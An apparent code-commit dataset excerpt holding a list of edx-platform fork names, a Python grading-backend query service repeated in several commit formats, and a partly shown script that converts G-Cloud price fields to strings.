tundex,IndonesiaX/edx-platform,Kalyzee/edx-platform,EduPepperPD/pepper2013,jbzdak/edx-platform,shubhdev/edx-platform,beacloudgenius/edx-platform,syjeon/new_edx,kursitet/edx-platform,UOMx/edx-platform,fintech-circle/edx-platform,xingyepei/edx-platform,shubhdev/openedx,dsajkl/123,bitifirefly/edx-platform,dcosentino/edx-platform,morenopc/edx-platform,pdehaye/theming-edx-platform,benpatterson/edx-platform,arifsetiawan/edx-platform,jelugbo/tundex,Stanford-Online/edx-platform,andyzsf/edx,deepsrijit1105/edx-platform,cpennington/edx-platform,carsongee/edx-platform,JioEducation/edx-platform,defance/edx-platform,Edraak/edraak-platform,DefyVentures/edx-platform,CourseTalk/edx-platform,tiagochiavericosta/edx-platform,jelugbo/tundex,Lektorium-LLC/edx-platform,ovnicraft/edx-platform,louyihua/edx-platform,rue89-tech/edx-platform,antoviaque/edx-platform,nttks/jenkins-test,torchingloom/edx-platform,benpatterson/edx-platform,doismellburning/edx-platform,jjmiranda/edx-platform,appliedx/edx-platform,shabab12/edx-platform,mjirayu/sit_academy,xingyepei/edx-platform,bdero/edx-platform,lduarte1991/edx-platform,rue89-tech/edx-platform,synergeticsedx/deployment-wipro,chudaol/edx-platform,rue89-tech/edx-platform,romain-li/edx-platform,arifs
etiawan/edx-platform,UXE/local-edx,IndonesiaX/edx-platform,andyzsf/edx,philanthropy-u/edx-platform,appliedx/edx-platform,gymnasium/edx-platform,halvertoluke/edx-platform,mahendra-r/edx-platform,MSOpenTech/edx-platform,jazkarta/edx-platform,openfun/edx-platform,angelapper/edx-platform,jazkarta/edx-platform-for-isc,ferabra/edx-platform,zhenzhai/edx-platform,jolyonb/edx-platform,arbrandes/edx-platform,simbs/edx-platform,zerobatu/edx-platform,caesar2164/edx-platform,chudaol/edx-platform,ESOedX/edx-platform,leansoft/edx-platform,Stanford-Online/edx-platform,jzoldak/edx-platform,jamiefolsom/edx-platform,jbassen/edx-platform,mjirayu/sit_academy,bigdatauniversity/edx-platform,eestay/edx-platform,jazkarta/edx-platform-for-isc,wwj718/edx-platform,franosincic/edx-platform,jjmiranda/edx-platform,arifsetiawan/edx-platform,WatanabeYasumasa/edx-platform,xingyepei/edx-platform,sameetb-cuelogic/edx-platform-test,alu042/edx-platform,vikas1885/test1,utecuy/edx-platform,vasyarv/edx-platform,motion2015/a3,waheedahmed/edx-platform,CredoReference/edx-platform,a-parhom/edx-platform,itsjeyd/edx-platform,shubhdev/openedx,jamesblunt/edx-platform,solashirai/edx-platform,wwj718/edx-platform,marcore/edx-platform,CredoReference/edx-platform,chauhanhardik/populo_2,deepsrijit1105/edx-platform,appliedx/edx-platform,alexthered/kienhoc-platform,apigee/edx-platform,kalebhartje/schoolboost,Softmotions/edx-platform,AkA84/edx-platform,SivilTaram/edx-platform,Lektorium-LLC/edx-platform,cecep-edu/edx-platform,nikolas/edx-platform,hkawasaki/kawasaki-aio8-1,EduPepperPD/pepper2013,zofuthan/edx-platform,nagyistoce/edx-platform,louyihua/edx-platform,PepperPD/edx-pepper-platform,romain-li/edx-platform,dkarakats/edx-platform,DNFcode/edx-platform,ahmadiga/min_edx,pelikanchik/edx-platform,PepperPD/edx-pepper-platform,arifsetiawan/edx-platform,nttks/jenkins-test,y12uc231/edx-platform,wwj718/ANALYSE,caesar2164/edx-platform,antoviaque/edx-platform,ahmadio/edx-platform,rhndg/openedx,analyseuc3m/ANALYSE-v1,nikolas/edx-platform,philanthropy-u/edx-platform,pomegranited/edx-platform,don-github/edx-platform,knehez/edx-platform,sudheerchintala/LearnEraPlatForm,inares/edx-platform,rhndg/openedx,leansoft/edx-platform,JioEducation/edx-platform,apigee/edx-platform,zofuthan/edx-platform,leansoft/edx-platform,playm2mboy/edx-platform,miptliot/edx-platform,yokose-ks/edx-platform,jswope00/griffinx,nttks/jenkins-test,TeachAtTUM/edx-platform,IONISx/edx-platform,jzoldak/edx-platform,xuxiao19910803/edx,vikas1885/test1,atsolakid/edx-platform,longmen21/edx-platform,xuxiao19910803/edx-platform,beni55/edx-platform,nttks/edx-platform,nagyistoce/edx-platform,IndonesiaX/edx-platform,motion2015/edx-platform,4eek/edx-platform,shashank971/edx-platform,dsajkl/reqiop,martynovp/edx-platform,kalebhartje/schoolboost,jzoldak/edx-platform,apigee/edx-platform,eduNEXT/edx-platform,marcore/edx-platform,peterm-itr/edx-platform,Softmotions/edx-platform,mtlchun/edx,devs1991/test_edx_docmode,WatanabeYasumasa/edx-platform,solashirai/edx-platform,Ayub-Khan/edx-platform,zofuthan/edx-platform,msegado/edx-platform,raccoongang/edx-platform,jazkarta/edx-platform-for-isc,nanolearningllc/edx-platform-cypress,SravanthiSinha/edx-platform,gsehub/edx-platform,Kalyzee/edx-platform,mitocw/edx-platform,rismalrv/edx-platform,EDUlib/edx-platform,pabloborrego93/edx-platform,beni55/edx-platform,romain-li/edx-platform,hamzehd/edx-platform,mjg2203/edx-platform-seas,xingyepei/edx-platform,dsajkl/reqiop,ampax/edx-platform-backup,nanolearning/edx-platform,fly19890211/edx-platform,kmoocdev2/edx-platform,ovnicraf
t/edx-platform,hamzehd/edx-platform,nanolearning/edx-platform,cyanna/edx-platform,zofuthan/edx-platform,edry/edx-platform,simbs/edx-platform,y12uc231/edx-platform,MSOpenTech/edx-platform,rationalAgent/edx-platform-custom,abdoosh00/edraak,abdoosh00/edx-rtl-final,mitocw/edx-platform,JCBarahona/edX,sameetb-cuelogic/edx-platform-test,ahmadiga/min_edx,naresh21/synergetics-edx-platform,jswope00/griffinx,msegado/edx-platform,SivilTaram/edx-platform,ubc/edx-platform,motion2015/a3,jonathan-beard/edx-platform,shubhdev/edx-platform,Shrhawk/edx-platform,benpatterson/edx-platform,ampax/edx-platform,marcore/edx-platform,nagyistoce/edx-platform,EduPepperPDTesting/pepper2013-testing,J861449197/edx-platform,ahmedaljazzar/edx-platform,dkarakats/edx-platform,jbassen/edx-platform,marcore/edx-platform,ovnicraft/edx-platform,martynovp/edx-platform,edry/edx-platform,waheedahmed/edx-platform,angelapper/edx-platform,zubair-arbi/edx-platform,mushtaqak/edx-platform,unicri/edx-platform,itsjeyd/edx-platform,Kalyzee/edx-platform,eduNEXT/edx-platform,hkawasaki/kawasaki-aio8-2,bitifirefly/edx-platform,4eek/edx-platform,mjirayu/sit_academy,hmcmooc/muddx-platform,SravanthiSinha/edx-platform,EDUlib/edx-platform,shubhdev/edx-platform,jamesblunt/edx-platform,jolyonb/edx-platform,sameetb-cuelogic/edx-platform-test,abdoosh00/edx-rtl-final,carsongee/edx-platform,proversity-org/edx-platform,synergeticsedx/deployment-wipro,jelugbo/tundex,vismartltd/edx-platform,pdehaye/theming-edx-platform,PepperPD/edx-pepper-platform,bdero/edx-platform,B-MOOC/edx-platform,angelapper/edx-platform,stvstnfrd/edx-platform,openfun/edx-platform,ubc/edx-platform,SivilTaram/edx-platform,kmoocdev2/edx-platform,shabab12/edx-platform,shubhdev/edxOnBaadal,etzhou/edx-platform,martynovp/edx-platform,MSOpenTech/edx-platform,don-github/edx-platform,valtech-mooc/edx-platform,Stanford-Online/edx-platform,motion2015/edx-platform,AkA84/edx-platform,a-parhom/edx-platform,jamesblunt/edx-platform,valtech-mooc/edx-platform,antonve/s4-project-mooc,JCBarahona/edX,kalebhartje/schoolboost,dsajkl/123,knehez/edx-platform,pelikanchik/edx-platform,vikas1885/test1,nttks/edx-platform,WatanabeYasumasa/edx-platform,defance/edx-platform,Ayub-Khan/edx-platform,doismellburning/edx-platform,chudaol/edx-platform,ampax/edx-platform-backup,yokose-ks/edx-platform,synergeticsedx/deployment-wipro,raccoongang/edx-platform,bdero/edx-platform,JCBarahona/edX,vismartltd/edx-platform,benpatterson/edx-platform,praveen-pal/edx-platform,franosincic/edx-platform,jazkarta/edx-platform-for-isc,TeachAtTUM/edx-platform,shurihell/testasia,alexthered/kienhoc-platform,AkA84/edx-platform,MSOpenTech/edx-platform,y12uc231/edx-platform,eduNEXT/edx-platform,DNFcode/edx-platform,jazztpt/edx-platform,mtlchun/edx,zerobatu/edx-platform,shubhdev/edxOnBaadal,itsjeyd/edx-platform,mjg2203/edx-platform-seas,prarthitm/edxplatform,longmen21/edx-platform,auferack08/edx-platform,ESOedX/edx-platform,jazkarta/edx-platform,torchingloom/edx-platform,olexiim/edx-platform,hkawasaki/kawasaki-aio8-0,inares/edx-platform,arbrandes/edx-platform,lduarte1991/edx-platform,alexthered/kienhoc-platform,peterm-itr/edx-platform,louyihua/edx-platform,eduNEXT/edunext-platform,chauhanhardik/populo_2,Livit/Livit.Learn.EdX,carsongee/edx-platform,jswope00/griffinx,hkawasaki/kawasaki-aio8-2,martynovp/edx-platform,teltek/edx-platform,WatanabeYasumasa/edx-platform,playm2mboy/edx-platform,ahmadio/edx-platform,dsajkl/123,jamiefolsom/edx-platform,zhenzhai/edx-platform,IONISx/edx-platform,raccoongang/edx-platform,Semi-global/edx-platform,morenopc/edx-platfor
m,hastexo/edx-platform,jamesblunt/edx-platform,UXE/local-edx,fintech-circle/edx-platform,etzhou/edx-platform,hamzehd/edx-platform,waheedahmed/edx-platform,iivic/BoiseStateX,edx/edx-platform,msegado/edx-platform,TsinghuaX/edx-platform,halvertoluke/edx-platform,LearnEra/LearnEraPlaftform,EduPepperPD/pepper2013,ampax/edx-platform-backup,EduPepperPDTesting/pepper2013-testing,xinjiguaike/edx-platform,mitocw/edx-platform,tiagochiavericosta/edx-platform,Endika/edx-platform,eduNEXT/edunext-platform,kmoocdev/edx-platform,hkawasaki/kawasaki-aio8-1,jbzdak/edx-platform,xinjiguaike/edx-platform,mcgachey/edx-platform,appsembler/edx-platform,miptliot/edx-platform,jbassen/edx-platform,y12uc231/edx-platform,Edraak/edx-platform,chand3040/cloud_that,utecuy/edx-platform,zhenzhai/edx-platform,polimediaupv/edx-platform,arifsetiawan/edx-platform,jamiefolsom/edx-platform,jazztpt/edx-platform,synergeticsedx/deployment-wipro,ZLLab-Mooc/edx-platform,alu042/edx-platform,appsembler/edx-platform,4eek/edx-platform,mbareta/edx-platform-ft,chauhanhardik/populo_2,antonve/s4-project-mooc,Semi-global/edx-platform,ampax/edx-platform,motion2015/edx-platform,xinjiguaike/edx-platform,proversity-org/edx-platform,SivilTaram/edx-platform,valtech-mooc/edx-platform,Edraak/circleci-edx-platform,polimediaupv/edx-platform,Livit/Livit.Learn.EdX,nanolearning/edx-platform,devs1991/test_edx_docmode,ahmadiga/min_edx,motion2015/edx-platform,apigee/edx-platform,pelikanchik/edx-platform,4eek/edx-platform,mbareta/edx-platform-ft,morpheby/levelup-by,beni55/edx-platform,rismalrv/edx-platform,adoosii/edx-platform,torchingloom/edx-platform,zerobatu/edx-platform,kmoocdev2/edx-platform,pku9104038/edx-platform,iivic/BoiseStateX,xuxiao19910803/edx-platform,RPI-OPENEDX/edx-platform,chauhanhardik/populo,xuxiao19910803/edx,fly19890211/edx-platform,vismartltd/edx-platform,10clouds/edx-platform,Unow/edx-platform,doganov/edx-platform,DNFcode/edx-platform,nttks/edx-platform,pepeportela/edx-platform,shubhdev/openedx,mcgachey/edx-platform,abdoosh00/edx-rtl-final,LICEF/edx-platform,EduPepperPD/pepper2013,longmen21/edx-platform,IONISx/edx-platform,antoviaque/edx-platform,UOMx/edx-platform,cpennington/edx-platform,wwj718/ANALYSE,mahendra-r/edx-platform,Endika/edx-platform,wwj718/edx-platform,shurihell/testasia,beni55/edx-platform,jazkarta/edx-platform,motion2015/a3,vasyarv/edx-platform,LearnEra/LearnEraPlaftform,EDUlib/edx-platform,hastexo/edx-platform,doismellburning/edx-platform,benpatterson/edx-platform,doganov/edx-platform,ESOedX/edx-platform,Shrhawk/edx-platform,kmoocdev/edx-platform,olexiim/edx-platform,pku9104038/edx-platform,praveen-pal/edx-platform,openfun/edx-platform,chand3040/cloud_that,morpheby/levelup-by,halvertoluke/edx-platform,jswope00/griffinx,ampax/edx-platform,chand3040/cloud_that,longmen21/edx-platform,CourseTalk/edx-platform,IITBinterns13/edx-platform-dev,Kalyzee/edx-platform,polimediaupv/edx-platform,stvstnfrd/edx-platform,procangroup/edx-platform,knehez/edx-platform,Edraak/circleci-edx-platform,zubair-arbi/edx-platform,UOMx/edx-platform,doganov/edx-platform,kmoocdev2/edx-platform,10clouds/edx-platform,auferack08/edx-platform,pepeportela/edx-platform,auferack08/edx-platform,edry/edx-platform,chudaol/edx-platform,eestay/edx-platform,louyihua/edx-platform,kursitet/edx-platform,dkarakats/edx-platform,TeachAtTUM/edx-platform,miptliot/edx-platform,iivic/BoiseStateX,alu042/edx-platform,hkawasaki/kawasaki-aio8-2,hastexo/edx-platform,eemirtekin/edx-platform,cognitiveclass/edx-platform,shubhdev/openedx,etzhou/edx-platform,motion2015/a3,sudheerchintala/
LearnEraPlatForm,beacloudgenius/edx-platform,zubair-arbi/edx-platform,utecuy/edx-platform,Edraak/edraak-platform,zadgroup/edx-platform,ferabra/edx-platform,xuxiao19910803/edx-platform,prarthitm/edxplatform,vismartltd/edx-platform,openfun/edx-platform,nanolearningllc/edx-platform-cypress,kalebhartje/schoolboost,eemirtekin/edx-platform,vasyarv/edx-platform,mushtaqak/edx-platform,pelikanchik/edx-platform,TsinghuaX/edx-platform,olexiim/edx-platform,zubair-arbi/edx-platform,philanthropy-u/edx-platform,sudheerchintala/LearnEraPlatForm,eduNEXT/edx-platform,morenopc/edx-platform,10clouds/edx-platform,IITBinterns13/edx-platform-dev,vasyarv/edx-platform,shashank971/edx-platform,DNFcode/edx-platform,eestay/edx-platform,proversity-org/edx-platform,hkawasaki/kawasaki-aio8-0,cognitiveclass/edx-platform,shubhdev/openedx,zadgroup/edx-platform,hkawasaki/kawasaki-aio8-0,mcgachey/edx-platform,shashank971/edx-platform,edx-solutions/edx-platform,jswope00/GAI,leansoft/edx-platform,fintech-circle/edx-platform,pabloborrego93/edx-platform,iivic/BoiseStateX,jswope00/GAI,appsembler/edx-platform,zerobatu/edx-platform,bigdatauniversity/edx-platform,pomegranited/edx-platform,Unow/edx-platform,DefyVentures/edx-platform,olexiim/edx-platform,nikolas/edx-platform,cognitiveclass/edx-platform,pabloborrego93/edx-platform,mcgachey/edx-platform,dcosentino/edx-platform,MakeHer/edx-platform,cecep-edu/edx-platform,analyseuc3m/ANALYSE-v1,don-github/edx-platform,naresh21/synergetics-edx-platform,ferabra/edx-platform,morenopc/edx-platform,beni55/edx-platform,jamiefolsom/edx-platform,jolyonb/edx-platform,pabloborrego93/edx-platform,dsajkl/123,halvertoluke/edx-platform,lduarte1991/edx-platform,rhndg/openedx,devs1991/test_edx_docmode,hmcmooc/muddx-platform,J861449197/edx-platform,ferabra/edx-platform,a-parhom/edx-platform,romain-li/edx-platform,chrisndodge/edx-platform,jzoldak/edx-platform,kamalx/edx-platform,waheedahmed/edx-platform,hamzehd/edx-platform,naresh21/synergetics-edx-platform,rismalrv/edx-platform,mtlchun/edx,SravanthiSinha/edx-platform,B-MOOC/edx-platform,motion2015/a3,playm2mboy/edx-platform,edry/edx-platform,jjmiranda/edx-platform,ahmadiga/min_edx,adoosii/edx-platform,mushtaqak/edx-platform,jswope00/GAI,cpennington/edx-platform,nanolearningllc/edx-platform-cypress-2,ZLLab-Mooc/edx-platform,SivilTaram/edx-platform,jbzdak/edx-platform,edx/edx-platform,atsolakid/edx-platform,jbzdak/edx-platform,etzhou/edx-platform,vikas1885/test1,bitifirefly/edx-platform,andyzsf/edx,stvstnfrd/edx-platform,abdoosh00/edraak,andyzsf/edx,openfun/edx-platform,LearnEra/LearnEraPlaftform,BehavioralInsightsTeam/edx-platform,Edraak/edx-platform,TeachAtTUM/edx-platform,nanolearning/edx-platform,shurihell/testasia,shubhdev/edxOnBaadal,Ayub-Khan/edx-platform,CredoReference/edx-platform,polimediaupv/edx-platform,IONISx/edx-platform,mtlchun/edx,yokose-ks/edx-platform,xuxiao19910803/edx-platform,edx/edx-platform,proversity-org/edx-platform,gymnasium/edx-platform,ak2703/edx-platform,peterm-itr/edx-platform,nagyistoce/edx-platform,cognitiveclass/edx-platform,DefyVentures/edx-platform,dcosentino/edx-platform,J861449197/edx-platform,teltek/edx-platform,nttks/edx-platform,xinjiguaike/edx-platform,hkawasaki/kawasaki-aio8-1,franosincic/edx-platform,itsjeyd/edx-platform,simbs/edx-platform,shubhdev/edxOnBaadal,Edraak/circleci-edx-platform,UXE/local-edx,ahmedaljazzar/edx-platform,unicri/edx-platform,B-MOOC/edx-platform,procangroup/edx-platform,jswope00/griffinx,jamiefolsom/edx-platform,eemirtekin/edx-platform,EduPepperPD/pepper2013,zhenzhai/edx-platform,RPI-OPENEDX/e
dx-platform,bigdatauniversity/edx-platform,vikas1885/test1,DefyVentures/edx-platform,rationalAgent/edx-platform-custom,lduarte1991/edx-platform,rismalrv/edx-platform,amir-qayyum-khan/edx-platform,Semi-global/edx-platform,nanolearningllc/edx-platform-cypress,beacloudgenius/edx-platform,appliedx/edx-platform,y12uc231/edx-platform,cognitiveclass/edx-platform,atsolakid/edx-platform,bdero/edx-platform,rationalAgent/edx-platform-custom,Shrhawk/edx-platform,ahmedaljazzar/edx-platform,edx-solutions/edx-platform,Unow/edx-platform,ubc/edx-platform,kamalx/edx-platform,shashank971/edx-platform,shurihell/testasia,playm2mboy/edx-platform,syjeon/new_edx,jazkarta/edx-platform-for-isc,PepperPD/edx-pepper-platform,abdoosh00/edx-rtl-final,amir-qayyum-khan/edx-platform,sameetb-cuelogic/edx-platform-test,DNFcode/edx-platform,wwj718/edx-platform,torchingloom/edx-platform,antoviaque/edx-platform,martynovp/edx-platform,adoosii/edx-platform,waheedahmed/edx-platform,AkA84/edx-platform,tanmaykm/edx-platform,kamalx/edx-platform,pdehaye/theming-edx-platform,doganov/edx-platform,cecep-edu/edx-platform,abdoosh00/edraak,atsolakid/edx-platform,solashirai/edx-platform,MakeHer/edx-platform,IONISx/edx-platform,valtech-mooc/edx-platform,gymnasium/edx-platform,dsajkl/reqiop,unicri/edx-platform,jruiperezv/ANALYSE,mbareta/edx-platform-ft,Kalyzee/edx-platform,wwj718/ANALYSE,ovnicraft/edx-platform,OmarIthawi/edx-platform,EduPepperPDTesting/pepper2013-testing,edry/edx-platform,PepperPD/edx-pepper-platform,J861449197/edx-platform,morpheby/levelup-by,morenopc/edx-platform,ampax/edx-platform-backup,ahmadio/edx-platform,defance/edx-platform,cselis86/edx-platform,OmarIthawi/edx-platform,a-parhom/edx-platform,kalebhartje/schoolboost,kmoocdev2/edx-platform,IndonesiaX/edx-platform,franosincic/edx-platform,valtech-mooc/edx-platform,iivic/BoiseStateX,caesar2164/edx-platform,nagyistoce/edx-platform,procangroup/edx-platform,inares/edx-platform,jbzdak/edx-platform,nttks/jenkins-test,Endika/edx-platform,praveen-pal/edx-platform,jazztpt/edx-platform,ferabra/edx-platform,eemirtekin/edx-platform,jruiperezv/ANALYSE,devs1991/test_edx_docmode,motion2015/edx-platform,ahmadio/edx-platform,jazztpt/edx-platform,Semi-global/edx-platform,shabab12/edx-platform,cyanna/edx-platform,knehez/edx-platform,alexthered/kienhoc-platform,MakeHer/edx-platform,yokose-ks/edx-platform,naresh21/synergetics-edx-platform,pepeportela/edx-platform,arbrandes/edx-platform,nanolearningllc/edx-platform-cypress,TsinghuaX/edx-platform,nanolearningllc/edx-platform-cypress-2,ahmadio/edx-platform,rationalAgent/edx-platform-custom,ubc/edx-platform,pku9104038/edx-platform,vismartltd/edx-platform,teltek/edx-platform,tiagochiavericosta/edx-platform,solashirai/edx-platform,cselis86/edx-platform,jolyonb/edx-platform,nanolearningllc/edx-platform-cypress,miptliot/edx-platform,jazkarta/edx-platform,kursitet/edx-platform,rationalAgent/edx-platform-custom,mushtaqak/edx-platform,jazkarta/edx-platform,RPI-OPENEDX/edx-platform,devs1991/test_edx_docmode,hkawasaki/kawasaki-aio8-0,chrisndodge/edx-platform,dkarakats/edx-platform,Endika/edx-platform,chand3040/cloud_that,MSOpenTech/edx-platform,chauhanhardik/populo_2,chrisndodge/edx-platform,analyseuc3m/ANALYSE-v1,bigdatauniversity/edx-platform,philanthropy-u/edx-platform,zadgroup/edx-platform,hkawasaki/kawasaki-aio8-2,carsongee/edx-platform,hkawasaki/kawasaki-aio8-1,shubhdev/edxOnBaadal,xuxiao19910803/edx,longmen21/edx-platform,kxliugang/edx-platform,gsehub/edx-platform,deepsrijit1105/edx-platform,JioEducation/edx-platform,inares/edx-platform,adoosii/edx-p
latform,nanolearningllc/edx-platform-cypress-2,IndonesiaX/edx-platform,ampax/edx-platform,auferack08/edx-platform,polimediaupv/edx-platform,LearnEra/LearnEraPlaftform,edx-solutions/edx-platform,kxliugang/edx-platform
|
Add service to query controller for eta of submission and to check if name is unique
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
        super(ControllerQueryService, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
<commit_before><commit_msg>Add service to query controller for eta of submission and to check if name is unique<commit_after>
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
        super(ControllerQueryService, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
Add service to query controller for eta of submission and to check if name is uniqueimport json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
        super(ControllerQueryService, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
<commit_before><commit_msg>Add service to query controller for eta of submission and to check if name is unique<commit_after>import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
        super(ControllerQueryService, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
|
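ControllerQueryService relies on GradingService for self.url and self.get; the real base class lives in grading_service.py and is not shown here, but a sketch of the assumed contract could look like:

import json
import requests

class GradingService(object):
    """Assumed minimal contract: hold the backend URL, wrap GET requests."""
    def __init__(self, config):
        self.url = config['url']

    def get(self, url, params):
        # Issue the request and decode the JSON body for the caller.
        response = requests.get(url, params=params)
        response.raise_for_status()
        return json.loads(response.text)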
84ac53d9b6070bc82259c6f099a7044eda2510f7
|
scripts/oneoff/fix-pricing.py
|
scripts/oneoff/fix-pricing.py
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
Add a script to fix G5 and G6 service prices
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
<commit_before><commit_msg>Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.<commit_after>
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
<commit_before><commit_msg>Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.<commit_after>#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
